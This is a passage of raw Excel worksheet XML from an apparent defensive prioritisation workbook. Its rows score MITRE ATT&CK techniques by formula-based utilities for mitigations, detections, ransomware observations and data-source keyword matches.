        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J237" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K237" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L237" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M237" s="37">
        <v>4.019E-3</v>
      </c>
      <c r="N237" s="56">
        <v>0</v>
      </c>
      <c r="O237" s="56">
        <v>1</v>
      </c>
      <c r="P237" s="56">
        <v>0</v>
      </c>
      <c r="Q237" s="56">
        <v>0</v>
      </c>
      <c r="R237" s="57" t="s">
        <v>830</v>
      </c>
      <c r="S237" s="57">
        <v>7</v>
      </c>
      <c r="T237" s="57" t="s">
        <v>831</v>
      </c>
      <c r="U237" s="57">
        <v>14</v>
      </c>
      <c r="V237" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20476180952380954</v>
      </c>
      <c r="W237" s="37">
        <v>21</v>
      </c>
      <c r="X237" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y237" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z237" s="37">
        <v>1</v>
      </c>
      <c r="AA237" s="37">
        <v>0.01</v>
      </c>
      <c r="AB237" s="37">
        <v>0.01</v>
      </c>
      <c r="AC237" s="37"/>
      <c r="AD237" s="50" t="s">
        <v>832</v>
      </c>
      <c r="AE237" s="37" t="str" cm="1">
        <f t="array" ref="AE237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD237)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF237" s="37">
        <v>233</v>
      </c>
      <c r="AG237" s="37" t="str" cm="1">
        <f t="array" ref="AG237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD237)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH237" s="37">
        <v>233</v>
      </c>
      <c r="AI237" s="37" t="str" cm="1">
        <f t="array" ref="AI237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD237)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ237" s="37">
        <v>233</v>
      </c>
      <c r="AK237" s="37" t="str" cm="1">
        <f t="array" ref="AK237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD237)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL237" s="37">
        <v>233</v>
      </c>
      <c r="AM237" s="37" t="str" cm="1">
        <f t="array" ref="AM237">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD237)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN237" s="37">
        <v>0</v>
      </c>
      <c r="AO237" s="37">
        <v>0</v>
      </c>
      <c r="AP237" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ237" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>96.030831761904764</v>
      </c>
      <c r="AR237" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS237" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT237" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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38" spans="1:47" ht="51">
      <c r="A238" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B238" s="37">
        <f t="shared" si="3"/>
        <v>332.41212785714293</v>
      </c>
      <c r="C238" s="37" t="s">
        <v>833</v>
      </c>
      <c r="D238" s="50" t="s">
        <v>834</v>
      </c>
      <c r="E238" s="37"/>
      <c r="F238" s="37">
        <v>2</v>
      </c>
      <c r="G238" s="37">
        <v>1</v>
      </c>
      <c r="H238" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I238" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J238" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K238" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L238" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M238" s="37">
        <v>0</v>
      </c>
      <c r="N238" s="56">
        <v>1</v>
      </c>
      <c r="O238" s="56">
        <v>3</v>
      </c>
      <c r="P238" s="56">
        <v>0</v>
      </c>
      <c r="Q238" s="56">
        <v>1</v>
      </c>
      <c r="R238" s="57" t="s">
        <v>835</v>
      </c>
      <c r="S238" s="57">
        <v>9</v>
      </c>
      <c r="T238" s="57" t="s">
        <v>836</v>
      </c>
      <c r="U238" s="57">
        <v>10</v>
      </c>
      <c r="V238" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20476214285714286</v>
      </c>
      <c r="W238" s="37">
        <v>19</v>
      </c>
      <c r="X238" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y238" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z238" s="37">
        <v>5</v>
      </c>
      <c r="AA238" s="37">
        <v>0.05</v>
      </c>
      <c r="AB238" s="37">
        <v>0.05</v>
      </c>
      <c r="AC238" s="37"/>
      <c r="AD238" s="50" t="s">
        <v>837</v>
      </c>
      <c r="AE238" s="37" t="str" cm="1">
        <f t="array" ref="AE238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD238)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF238" s="37">
        <v>234</v>
      </c>
      <c r="AG238" s="37" t="str" cm="1">
        <f t="array" ref="AG238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD238)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH238" s="37">
        <v>234</v>
      </c>
      <c r="AI238" s="37" t="str" cm="1">
        <f t="array" ref="AI238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD238)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ238" s="37">
        <v>234</v>
      </c>
      <c r="AK238" s="37" t="str" cm="1">
        <f t="array" ref="AK238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD238)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL238" s="37">
        <v>234</v>
      </c>
      <c r="AM238" s="37" t="str" cm="1">
        <f t="array" ref="AM238">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD238)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN238" s="37">
        <v>0</v>
      </c>
      <c r="AO238" s="37">
        <v>0</v>
      </c>
      <c r="AP238" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ238" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>110.80404261904765</v>
      </c>
      <c r="AR238" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS238" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT238" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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39" spans="1:47" ht="68">
      <c r="A239" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B239" s="37">
        <f t="shared" si="3"/>
        <v>399.40252095238094</v>
      </c>
      <c r="C239" s="37" t="s">
        <v>838</v>
      </c>
      <c r="D239" s="50" t="s">
        <v>839</v>
      </c>
      <c r="E239" s="37"/>
      <c r="F239" s="37">
        <v>1</v>
      </c>
      <c r="G239" s="37">
        <v>1</v>
      </c>
      <c r="H239" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I239" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J239" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K239" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L239" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M239" s="37">
        <v>6.3500000000000004E-4</v>
      </c>
      <c r="N239" s="56">
        <v>0</v>
      </c>
      <c r="O239" s="56">
        <v>2</v>
      </c>
      <c r="P239" s="56">
        <v>1</v>
      </c>
      <c r="Q239" s="56">
        <v>5</v>
      </c>
      <c r="R239" s="57" t="s">
        <v>840</v>
      </c>
      <c r="S239" s="57">
        <v>12</v>
      </c>
      <c r="T239" s="57" t="s">
        <v>841</v>
      </c>
      <c r="U239" s="57">
        <v>18</v>
      </c>
      <c r="V239" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.32380976190476191</v>
      </c>
      <c r="W239" s="37">
        <v>30</v>
      </c>
      <c r="X239" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Y239" s="37">
        <v>0.54545500000000002</v>
      </c>
      <c r="Z239" s="37">
        <v>8</v>
      </c>
      <c r="AA239" s="37">
        <v>0.08</v>
      </c>
      <c r="AB239" s="37">
        <v>0.08</v>
      </c>
      <c r="AC239" s="37"/>
      <c r="AD239" s="50" t="s">
        <v>842</v>
      </c>
      <c r="AE239" s="37" t="str" cm="1">
        <f t="array" ref="AE239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD239)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF239" s="37">
        <v>235</v>
      </c>
      <c r="AG239" s="37" t="str" cm="1">
        <f t="array" ref="AG239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD239)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH239" s="37">
        <v>235</v>
      </c>
      <c r="AI239" s="37" t="str" cm="1">
        <f t="array" ref="AI239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD239)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ239" s="37">
        <v>235</v>
      </c>
      <c r="AK239" s="37" t="str" cm="1">
        <f t="array" ref="AK239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD239)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL239" s="37">
        <v>235</v>
      </c>
      <c r="AM239" s="37" t="str" cm="1">
        <f t="array" ref="AM239">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD239)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN239" s="37">
        <v>0</v>
      </c>
      <c r="AO239" s="37">
        <v>3</v>
      </c>
      <c r="AP239" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ239" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>133.13417365079366</v>
      </c>
      <c r="AR239" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS239" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT239" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU23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9.581012403628117</v>
      </c>
    </row>
    <row r="240" spans="1:47" ht="34">
      <c r="A240" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="B240" s="37">
        <f t="shared" si="3"/>
        <v>1023.6185100000001</v>
      </c>
      <c r="C240" s="37" t="s">
        <v>843</v>
      </c>
      <c r="D240" s="50" t="s">
        <v>844</v>
      </c>
      <c r="E240" s="37"/>
      <c r="F240" s="37">
        <v>1</v>
      </c>
      <c r="G240" s="37">
        <v>1</v>
      </c>
      <c r="H240" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I240" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J240" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K240" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L240" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M240" s="37">
        <v>2.2420000000000001E-3</v>
      </c>
      <c r="N240" s="56">
        <v>0</v>
      </c>
      <c r="O240" s="56">
        <v>74</v>
      </c>
      <c r="P240" s="56">
        <v>15</v>
      </c>
      <c r="Q240" s="56">
        <v>31</v>
      </c>
      <c r="R240" s="57" t="s">
        <v>845</v>
      </c>
      <c r="S240" s="57">
        <v>24</v>
      </c>
      <c r="T240" s="57" t="s">
        <v>846</v>
      </c>
      <c r="U240" s="57">
        <v>29</v>
      </c>
      <c r="V240" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.98095219047619053</v>
      </c>
      <c r="W240" s="37">
        <v>53</v>
      </c>
      <c r="X240" s="37">
        <v>0.96363600000000005</v>
      </c>
      <c r="Y240" s="37">
        <v>0.96363600000000005</v>
      </c>
      <c r="Z240" s="37">
        <v>120</v>
      </c>
      <c r="AA240" s="37">
        <v>1.2</v>
      </c>
      <c r="AB240" s="37">
        <v>1</v>
      </c>
      <c r="AC240" s="37"/>
      <c r="AD240" s="50" t="s">
        <v>847</v>
      </c>
      <c r="AE240" s="37" t="str" cm="1">
        <f t="array" ref="AE240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD240)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF240" s="37">
        <v>236</v>
      </c>
      <c r="AG240" s="37" t="str" cm="1">
        <f t="array" ref="AG240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD240)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH240" s="37">
        <v>236</v>
      </c>
      <c r="AI240" s="37" t="str" cm="1">
        <f t="array" ref="AI240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD240)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ240" s="37">
        <v>236</v>
      </c>
      <c r="AK240" s="37" t="str" cm="1">
        <f t="array" ref="AK240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD240)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL240" s="37">
        <v>236</v>
      </c>
      <c r="AM240" s="37" t="str" cm="1">
        <f t="array" ref="AM240">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD240)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN240" s="37">
        <v>0</v>
      </c>
      <c r="AO240" s="37">
        <v>6</v>
      </c>
      <c r="AP240" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="AQ240" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>341.20617000000004</v>
      </c>
      <c r="AR240" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS240" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT240" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU24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48.886595714285718</v>
      </c>
    </row>
    <row r="241" spans="1:47" ht="17">
      <c r="A241" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B241" s="37">
        <f t="shared" si="3"/>
        <v>333.70450719047625</v>
      </c>
      <c r="C241" s="37" t="s">
        <v>848</v>
      </c>
      <c r="D241" s="50" t="s">
        <v>849</v>
      </c>
      <c r="E241" s="37"/>
      <c r="F241" s="37">
        <v>1</v>
      </c>
      <c r="G241" s="37">
        <v>1</v>
      </c>
      <c r="H241" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I241" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J241" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K241" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L241" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M241" s="37">
        <v>4.019E-3</v>
      </c>
      <c r="N241" s="56">
        <v>0</v>
      </c>
      <c r="O241" s="56">
        <v>1</v>
      </c>
      <c r="P241" s="56">
        <v>4</v>
      </c>
      <c r="Q241" s="56">
        <v>3</v>
      </c>
      <c r="R241" s="57" t="s">
        <v>850</v>
      </c>
      <c r="S241" s="57">
        <v>14</v>
      </c>
      <c r="T241" s="57" t="s">
        <v>851</v>
      </c>
      <c r="U241" s="57">
        <v>8</v>
      </c>
      <c r="V241" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.24761904761904766</v>
      </c>
      <c r="W241" s="37">
        <v>22</v>
      </c>
      <c r="X241" s="37">
        <v>0.4</v>
      </c>
      <c r="Y241" s="37">
        <v>0.4</v>
      </c>
      <c r="Z241" s="37">
        <v>8</v>
      </c>
      <c r="AA241" s="37">
        <v>0.08</v>
      </c>
      <c r="AB241" s="37">
        <v>0.08</v>
      </c>
      <c r="AC241" s="37"/>
      <c r="AD241" s="50" t="s">
        <v>852</v>
      </c>
      <c r="AE241" s="37" t="str" cm="1">
        <f t="array" ref="AE241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD241)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF241" s="37">
        <v>237</v>
      </c>
      <c r="AG241" s="37" t="str" cm="1">
        <f t="array" ref="AG241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD241)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH241" s="37">
        <v>237</v>
      </c>
      <c r="AI241" s="37" t="str" cm="1">
        <f t="array" ref="AI241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD241)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ241" s="37">
        <v>237</v>
      </c>
      <c r="AK241" s="37" t="str" cm="1">
        <f t="array" ref="AK241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD241)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL241" s="37">
        <v>237</v>
      </c>
      <c r="AM241" s="37" t="str" cm="1">
        <f t="array" ref="AM241">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD241)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN241" s="37">
        <v>0</v>
      </c>
      <c r="AO241" s="37">
        <v>0</v>
      </c>
      <c r="AP241" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ241" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>111.23483573015875</v>
      </c>
      <c r="AR241" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS241" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT241" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU24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42" spans="1:47" ht="17">
      <c r="A242" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B242" s="37">
        <f t="shared" si="3"/>
        <v>308.59047619047624</v>
      </c>
      <c r="C242" s="37" t="s">
        <v>853</v>
      </c>
      <c r="D242" s="50" t="s">
        <v>849</v>
      </c>
      <c r="E242" s="37" t="s">
        <v>854</v>
      </c>
      <c r="F242" s="37">
        <v>1</v>
      </c>
      <c r="G242" s="37">
        <v>1</v>
      </c>
      <c r="H242" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I242" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J242" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K242" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L242" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M242" s="37">
        <v>0</v>
      </c>
      <c r="N242" s="56">
        <v>0</v>
      </c>
      <c r="O242" s="56">
        <v>1</v>
      </c>
      <c r="P242" s="56">
        <v>0</v>
      </c>
      <c r="Q242" s="56">
        <v>2</v>
      </c>
      <c r="R242" s="57" t="s">
        <v>850</v>
      </c>
      <c r="S242" s="57">
        <v>14</v>
      </c>
